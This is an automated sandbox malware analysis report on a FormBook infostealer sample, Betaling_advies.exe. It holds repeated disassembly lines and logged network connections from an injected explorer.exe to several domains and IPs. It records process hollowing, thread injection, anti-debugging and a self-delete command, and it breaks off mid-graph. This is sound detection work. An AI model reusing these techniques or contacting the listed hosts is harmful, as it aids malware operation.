          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0477FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0477FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04708EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04790EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04790EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04790EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04782073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04791074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04794015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04794015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04743884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04743884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0470927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0477B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0477B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04754257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04704A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04704A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exeDomain query: www.ladybugtubs.com
          Source: C:\Windows\explorer.exeDomain query: www.kathyscrabhouse.com
          Source: C:\Windows\explorer.exeDomain query: www.boulderhalle-hamburg.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.187.111.219 80
          Source: C:\Windows\explorer.exeDomain query: www.osaka-computer.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.178.109.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.150 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.253 80
          Source: C:\Windows\explorer.exeDomain query: www.neutrasystems.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.208.69.149 80
          Source: C:\Windows\explorer.exeDomain query: www.allwest-originals.com
          Source: C:\Windows\explorer.exeDomain query: www.thenewyorker.computer
          Source: C:\Windows\explorer.exeDomain query: www.loanascustomboutique.com
          Source: C:\Windows\explorer.exeDomain query: www.werealestatephotography.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeDomain query: www.wellalytics.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.themusasoficial.com
          Source: C:\Windows\explorer.exeDomain query: www.specstrii.com
          Source: C:\Windows\explorer.exeDomain query: www.organicfarmteam.com
          Source: C:\Windows\explorer.exeDomain query: www.dfch18.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeSection loaded: unknown target: C:\Users\user\Desktop\Betaling_advies.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Betaling_advies.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Betaling_advies.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Betaling_advies.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 180000
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: explorer.exe, 00000004.00000000.653956972.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000002.910233806.0000000001080000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.667363624.0000000005E50000.00000004.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.910233806.0000000001080000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.910233806.0000000001080000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.670564203.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383925 Sample: Betaling_advies.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.carsoncredittx.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 4 other signatures 2->45 11 Betaling_advies.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\571kzkbal.dll, PE32 11->29 dropped 55 Detected unpacking (changes PE section rights) 11->55 57 Maps a DLL or memory area into another process 11->57 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Contains functionality to prevent local Windows debugging 11->61 15 Betaling_advies.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an 